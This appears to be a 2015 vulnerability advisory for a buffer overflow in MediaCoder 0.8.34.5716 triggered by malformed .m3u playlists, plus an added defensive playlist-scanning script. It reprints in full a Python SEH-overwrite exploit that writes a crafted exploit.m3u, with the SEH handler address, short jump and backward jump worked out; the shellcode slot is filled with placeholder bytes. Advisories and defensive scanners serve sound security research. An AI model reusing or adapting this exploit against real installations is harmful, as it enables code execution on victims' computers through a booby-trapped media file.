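MediaCoder 0.8.34.5716 Buffer Overflow Vulnerability
Posted: 2015-05-08 10:11:09

Published: 2015-05-06
Updated: 2015-05-07

Affected systems:
MediaCoder MediaCoder 0.8.34.5716

Details:
MediaCoder is a free, general-purpose batch audio/video transcoding tool.

MediaCoder has a buffer overflow vulnerability when processing malformed .m3u files; an attacker can exploit this vulnerability to perform unauthorized operations.

Source:
vendor

Test method:
Warning: The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

#!/usr/bin/python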
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insufficient space after taking control of the EIP, you have to jump backwards and also
#        avoid a few bad bytes after the "A"s.

buffersize = 853
buffer = ("http://" + "\x41" * 256)
# Space for shellcode to decode
buffer += "\x90" * 24
# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
# [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
# unsigned char buf[] =
buffer += "\x42" * 350
nseh = "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret  | [libiconv-2.dll]
seh = "\xee\x04\x01\x66"
# Jump back 603 bytes due to insufficient space for shellcode
jmpbck = "\xe9\xA5\xfd\xff\xff"
junk = ("D" * 55)
f = open("exploit.m3u", 'w')
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()

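Solution:

Vendor patch:

MediaCoder
----------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: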
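
With no vendor patch available, one stopgap is to screen playlists before they are opened in MediaCoder. The script below is an added example, not part of the original advisory or the exploit author's code; the name scan_m3u, the 512-byte limit and the sample playlists are assumptions constructed for illustration, and the limit is a policy choice, not the size of MediaCoder's internal buffer.

```python
import sys

# Assumed policy limit for one playlist line; NOT MediaCoder's buffer size.
MAX_LINE_BYTES = 512


def scan_m3u(data, max_line=MAX_LINE_BYTES):
    """Return (line_number, reason) findings for the raw bytes of an .m3u file."""
    findings = []
    # bytes.splitlines() breaks only on CR / LF, so other bytes stay in the line.
    for lineno, raw in enumerate(data.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        # Over-long entries or directives are the basic shape of a malformed playlist.
        if len(line) > max_line:
            findings.append((lineno, "line is %d bytes (limit %d)" % (len(line), max_line)))
        # Control bytes have no place in a path, URL or #EXT directive.
        if any((b < 0x20 and b != 0x09) or b == 0x7F for b in line):
            findings.append((lineno, "control bytes present"))
        # Heuristic: legacy playlists in a local code page will also trip this check.
        try:
            line.decode("utf-8")
        except UnicodeDecodeError:
            findings.append((lineno, "not valid UTF-8 text"))
    return findings


# Constructed samples: a normal playlist and one with an over-long binary entry.
BENIGN = (b"#EXTM3U\r\n#EXTINF:215,Artist - Title\r\n"
          b"C:\\Music\\track01.mp3\r\nhttp://example.com/stream.mp3\r\n")
OVERSIZED = b"#EXTM3U\r\nhttp://" + b"A" * 900 + b"\x01\xff\r\n"


if __name__ == "__main__":
    status = 0
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for lineno, reason in scan_m3u(fh.read()):
                print("%s:%d: %s" % (path, lineno, reason))
                status = 1
    sys.exit(status)  # non-zero exit lets a wrapper script quarantine the file
```

Run it with one or more playlist paths as arguments; a non-zero exit status means at least one line was flagged and the file should be reviewed before it is opened.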
     
 
     

   



